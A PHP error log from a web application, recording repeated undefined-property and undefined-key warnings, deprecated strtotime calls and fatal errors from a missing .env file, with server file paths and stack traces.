[11-Apr-2025 01:03:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:16:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:26:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:27:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:28:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:29:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:42:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:45:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:46:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 01:57:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 02:02:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 02:32:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 03:09:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:11:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 03:21:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:21:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:22:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 03:37:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:37:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:37:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:37:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 03:38:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [11-Apr-2025 04:03:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 04:15:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 04:41:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 04:51:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:17:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:17:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:31:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 05:52:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:00:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:04:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:16:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [11-Apr-2025 06:27:46 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [11-Apr-2025 07:32:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 07:32:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 08:23:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 08:33:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 17:50:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Aug-2025 01:24:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Aug-2025 01:25:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Aug-2025 02:59:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Aug-2025 03:09:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Aug-2025 03:14:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Aug-2025 04:59:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Sep-2025 02:45:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Sep-2025 03:25:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Sep-2025 00:43:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Sep-2025 00:31:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Sep-2025 01:45:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Sep-2025 03:34:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Sep-2025 03:42:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Sep-2025 08:24:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 10:45:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 10:51:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 10:51:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 11:13:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 11:13:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Sep-2025 11:44:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Sep-2025 07:16:38 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [30-Sep-2025 07:16:39 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [09-Oct-2025 04:10:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [09-Oct-2025 04:10:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:43:59 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:44:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:46:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:47:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:48:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 05:49:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:55:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:55:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:55:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:56:09 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 06:56:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:30 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:39 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in 